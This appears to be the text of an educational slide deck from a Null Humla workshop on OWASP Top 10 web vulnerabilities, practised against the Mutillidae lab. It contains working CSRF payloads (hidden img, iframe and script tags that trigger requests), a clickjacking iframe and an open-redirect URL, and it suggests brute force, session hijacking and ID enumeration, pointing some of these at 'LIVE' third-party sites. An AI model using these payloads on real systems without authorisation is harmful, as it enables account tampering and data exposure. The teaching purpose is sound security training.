Top 10 Web Application Security Hazards

{ Part - 2 }

by Abhinav Sejpal
@  

Null - Humla Session

Flipkart - Bangalore

Disclaimer


  • This presentation is intended for educational purpose only and I cannot be held liable for any kind of damages done, whatsoever to your machine, or any other damages. 
  • Don't try this attack on any other system without having context knowledge or permission, this may harm someone directly or indirectly.
  • Feel free to use this presentation for practice or education purpose.


^ I hope - You gotcha ^


Agenda


  • No Revision of Part - 1
  • Understand New Attacks
  • Self exploratory exercise
  • Learn + Hack   
  • Q  &  A


  for Social Media

Twitter handle 

 @ @Abhinav_Sejpal

Hashtag for this session

     #Nullhumla #nullblr



Humla


Means 'attack' in Hindi


                        

 


   



Objectives for this session


  • Build Security Awareness for web application
  • Learn way to discover Security vulnerabilities
  • Learn basic of secure web application via OWASP Top 10




Let's Begin our Journey

of 

Top 10 Web Application Security Hazards


 * We won't talk about Injection & XSS *



Setup the Test Lab

Install XAMPP


Acronym for:


Targeted Application


Client Side language : HTML & Javascript
Server side Language: PHP
DB : MYSQL 


Why PHP ?  - Any answer Here?


Why MySQL?  MySQL is  Girlfriend of PHP <3 

PHP is used by 82.2% of all the websites as server-side programming language.


http://w3techs.com/technologies/overview/programming_language/all



PHP: 244M sites

2.1M IP addresses



2013 Server-side Programming Language of the Year
Don't Mind Power of PHP > Facebook & yahoo 

http://w3techs.com/blog/entry/web_technologies_of_the_year_2013

Play ground


Mutillidae 


It's a free, open source web application provided to allow security enthusiast to pen-test and hack a web application.

V.2X developed by  Jeremy Druin aka webpwnized.




All set with Multillidae ?


Am I Vulnerable To 'CSRF' ?



OWASP A8 - CSRF

Cross-Site Request Forgery


CSRF Attack Cycle


CSRF AKA. XSRF


 The attacker exploits the trust a website has against a user’s browser.


  •  Permission faking\stealing
  •  Disruption of the normal sequence of the site



Demo #1

Login ID - admin

password - adminpass


HTTP GET Request

http://127.0.0.1/xampp/mutillidae/index.php?do=logout

: Answer  Demo 1:


<html>
<title> CSRF Demo 1 </title>

<a href=http://127.0.0.1/xampp/mutillidae/index.php?do=logout>

Click me </a>
</html>



Understanding


  • Logout page was a simple HTTP GET that required no confirmation


  • Every user who visited that page would immediately be logged out - that's CSRF in action.


Yes it's not dangerous but annoying





So what do you think,

it's all about Click ?


ssh, No!!


Would you like to write CSRF exploit without click ??





Image Tag


<img style="display:none;" src="your Request">


 Image tag does not require clicking the link compared Tag-A requires clicking on the link to activate the HTTP request


Can we try Demo 1 with Image tag ?




CSRF GET Request with Image Tag


<html>
<title> CSRF Demo 1 </title>

<img src=http://127.0.0.1/xampp/mutillidae/index.php?do=logout>

</html>

The Nature of browsers is to send HTTP requests to visual objects such as picture or remote files (CSS, JS, etc.) even while loading the page without the user's permissions.


Iframe tag

<iframe src="your Request"></iframe>


Java Script code

                <script> var X= new Image();           
                                   X.src = "URL";
                </script>

                        Can we try Demo 1 with Iframe & JS ?

HTTP Request


<iframe src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"></iframe>



          <script> var X= new Image();           
                                   X.src= "
http://127.0.0.1/xampp/mutillidae/index.php?do=logout";                

</script>

Challenge  #1

:: Solution #1 ::

<html>

<title> CSRF Demo 1 </title>

<a href =http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote>
Click me </a>

</html>

Challenge  #2


{ Post HTTP Request }




: Solution Available :

http://127.0.0.1/xampp/CSRF Attack/Add New Blog Entry - CSRF POST.html


Does it easy to create CSRF HTTP request ?

No - you should try out  


~ CSRF Finder Firefox add-on   ~


* One Click POC *

* Hybrid automation *


Thank you -  Piyush Pattanayak



CSRF Finder Demo

Live Challenge


* Signup disabled *

Please use the username test and the password test


CSRF & XSRF

Update the user info. without their knowledge

http://testphp.vulnweb.com/userinfo.php

Copyright © 2014, Acunetix Ltd


You've been CSRF'd with static token! 

Can we exploit this with Level #2 ?





Popular Cool findings


Facebook CSRF worth USD 5000 by Amol


Google Groups Profile CSRF

Google Account display pic deletion
Facebook Account deactivation


Advance Leanings -  CSRF Token Validation Fail

http://haiderm.com/csrf-token-protection-bypass-methods/

 

Am I Vulnerable To 'Broken Authentication  &

Session Management'?

A2 - OWASP TOP 10




Lets' bypass the Mutillidae 


Can we do it  ?


Part -1 Learning with SQL Injection

Apply Brute Force Attack

/xampp/mutillidae/index.php?page=login.php

Account Lock Policy & Captcha missing :P



In-secured Session-ID



Cookies Flag HTTP ONLY 
Secure flag would be complimentary


XSS Session Hijacking 


PHPSESSID=0ebmp37g8v8stqsjpf1ln40c20

JSESSIONID
ASP Session.SessionID

Let's Try out Part 1 learning and exploit  the session


So, Let's Learn about Web App DB structure


Passwords are stored in plain text.


oh really  -- ':(

OWASP #A6


Password is protected, when stored using encryption algorithm.  Are you sure? 

http://www.md5online.org/

You may also try out hash but password salt is a recommended solution so far.

Password Policy should be applied nicely and should not be weaker.
-- * --
Security & Business logic should be applied for changing password. 

Change password doesn't ask for Current password - LOL 


Robots.txt 


All Sensitive data expose

Take Away 


Avoiding Insecure Direct Object References



OWASP #A4  

 URLS' Pattern





Demo  #1

Tamper the ID parameter
http://127.0.0.1/xampp/sqli/secondorder_changepass.php

Enumeration using parameter

LIVE

https://profile.utest.com/67797



https://profile.utest.com/200 -- N



https://99tests.com/testers/3298




Secret PHP Server Configuration Page


http://127.0.0.1/xampp/mutillidae/index.php?page=phpinfo.php




Missing Function Level Access Control


OWASP #A7

Concept




LIVE

http://stepinforum.org/mailers2014/


http://demo.testfire.net/pr/

OWASP #A9

Using Known Vulnerable Components


Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf

Cool Wordpress Projects


Code Vigilant


Latest buzzing known vulnerabilities

#Heartbleed



Can you verify that -  your website SSL  Cert isn't vulnerable to Heart bleed attack?

Google - SSL Heart bleed Fix verification script

https://lastpass.com/heartbleed/



History Attack !!!



A6 – Sensitive Data Exposure






Security Misconfiguration

OWASP -#A5




Click Jacking


Code: – <iframe src= http://www.testingcircus.com> </iframe>
Live Demo: – http://goo.gl/6gEq2I
Click jacking Testing tool: – http://goo.gl/27VgQb


     If you are planning to host your own server 

this talk matters for you 

"Securing a Linux Web Server in 10 Steps"

by Akash Mahajan 


https://www.youtube.com/watch?v=ort9qxzu3h0


Elmah.axd Error logs

 Google search


https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards



Vulnerable  Redirection


http://127.0.0.1/xampp/mutillidae/index.php?page=redirectandlog.php&forwardurl=http://www.owasp.org


I don't think so, i need to explain you what you can do here :D





Would like to do more practice ? Here is your Playground


http://demo.testfire.net/

Copyright © 2014, IBM Corporation


Yes - I'm Done!


Feel free to write me at bug.wrangler at outlook.com

We need you!


  • Attend Null Meets-up & give presentations.
  • Share your ideas & leanings.
  • Talk to our community champions & gain from leanings.
  • Your feedback helps us to build a good community.
  • Looking forward to your ongoing support.


http://null.co.in/

Say 'Hello' @null0x00

Credits



- Twitter Folks -
 
@TroyHunt , @yog3sharma ,   @HaiderMQ

 #Nullblr Leads & Champions

Big thank you to @ ,@ru94mb  & you All.

Indian Hackers/Infosec guys & groups you should be following in Twitter

Thank-you http://garage4hackers.com/ community

Thank you! 


Keep the security ante up.


License and Copyrights


https://slides.com/abhinavsejpal/top-10-web-application-security-hazards--2


Copyrights 2013-2014 Abhinav Sejpal

-----

 (CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

 Dedicated to my lovely daddy


Made with Slides.com